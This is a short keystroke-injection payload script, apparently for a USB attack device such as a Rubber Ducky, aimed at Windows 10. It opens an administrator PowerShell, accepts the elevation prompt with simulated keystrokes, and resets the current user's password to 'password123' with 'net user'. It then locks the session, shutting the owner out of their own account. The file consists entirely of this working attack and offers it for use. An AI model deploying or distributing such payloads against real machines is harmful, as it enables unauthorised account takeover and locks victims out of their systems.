REM #####################################################################################
REM #                                                                                   |
REM # Title        : Change password for current Windows User                           |
REM # Author       : Andre Dias & Nuno Bernardino                                       |
REM # Version      : 1.0                                                                |
REM # Category     : Execute                                                            |
REM # Target       : Windows 10                                                         |
REM # Idea         : execution/Change_the_password_of_the_windows_user/payload.txt      |
REM #                                                                                   |
REM #####################################################################################

REM Requirements:
REM     Administrator Access

REM Open Powershell in Administrator Mode
DELAY 500
GUI r
DELAY 500
STRING powershell
CTRL SHIFT ENTER
DELAY 500
LEFT
ENTER
DELAY 1000

REM Run command to change password
DELAY 200
STRING net user $env:USERNAME password123
DELAY 100
ENTER
DELAY 100

REM Lock user shortcut
GUI l